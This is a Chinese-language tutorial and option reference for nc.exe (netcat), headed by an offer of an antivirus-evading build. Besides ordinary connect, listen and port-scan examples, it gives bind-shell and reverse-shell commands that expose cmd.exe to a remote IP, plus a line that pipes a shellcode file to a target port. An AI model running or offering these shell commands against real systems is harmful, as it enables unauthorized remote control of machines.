nc.exe 使用方法

《nc.exe免殺版》瑞士*** nc.exe下載附使用方法

作網絡安全測試在命令行下使用的網絡監聽工具。

 

軟件功能介紹使用幫助說明：

參數說明： 
-h 查看幫助信息 
-d 後臺模式 
-e prog程序重定向，一但鏈接就執行〔危險〕 
-i secs延時的間隔 
-l 監聽模式，用於入站鏈接 
-L 監聽模式，鏈接天閉後仍然繼續監聽，直到CTR+C 
-n IP地址，不能用域名 
-o film記錄16進制的傳輸 
-p[空格]端口 本地端口號 
-r 隨機本地及遠程端口 
-t 使用Telnet交互方式 
-u UDP模式 
-v 詳細輸出，用-vv將更詳細 
-w數字 timeout延時間隔 
-z 將輸入，輸出關掉（用於掃錨時）

主要用法以下

1)鏈接到REMOTE主機，例子： 格式：nc -nvv 192.168.x.x 80 講解：連到192.168.x.x的TCP80端口

2)監聽LOCAL主機，例子： 格式：nc -l -p 80 講解：監聽本機的TCP80端口

3)掃描遠程主機，例子： 格式：nc -nvv -w2 -z 192.168.x.x 80-445 講解：掃描192.168.x.x的TCP80到TCP445的全部端口

4)REMOTE主機綁定SHELL，例子： 格式：nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe 講解：綁定REMOTE主機的CMDSHELL在REMOTE主機的TCP5354端口

5)REMOTE主機綁定SHELL並反向鏈接，例子： 格式：nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354 講解：綁定REMOTE主機的CMDSHELL並反向鏈接到192.168.x.x的TCP5354端口 以上爲最基本的幾種用法（其實NC的用法還有不少， 當配合管道命令"|"與重定向命令"<"、">"等等命令功能更強大......）。

高級用法：

6)做***程序用，例子：

格式1：type.exe c:\exploit.txt|nc -nvv 192.168.x.x 80

格式2：nc-nvv192.168.x.x80

講解：鏈接到192.168.x.x的80端口，並在其管道中發送'c:\ex ploit.txt'的內容(兩種格式確有相同的效果， 真是有殊途同歸之妙:P)

附：'c:\exploit.txt'爲shellcode等 7)做蜜罐用[1]，例子： 格式：nc -L -p 80 講解：使用'-L'(注意L是大寫)能夠不停地監聽某一個端口，直到ctrl+c爲止

8)做蜜罐用[2]，

例子： 格式：nc -L -p 80>c:\log.txt

講解：使用'-L'能夠不停地監聽某一個端口，直到ctrl+c爲止，同時把結果輸出到'c:\log.txt'中，若是把'& gt;' 改成'>>'便可以追加日誌 附：'c:\log.txt'爲日誌等

9)做蜜罐用[3]，

例子： 格式1：nc -L -p 80 格式2：type.exe c:\honeypot.txt|nc -L -p 80

講解：使用'-L'能夠不停地監聽某一個端口，直到ctrl+c爲止，並把'c:\honeypot.txt'的內容'送'入其 管道中

nc -e cmd.exe ip 5277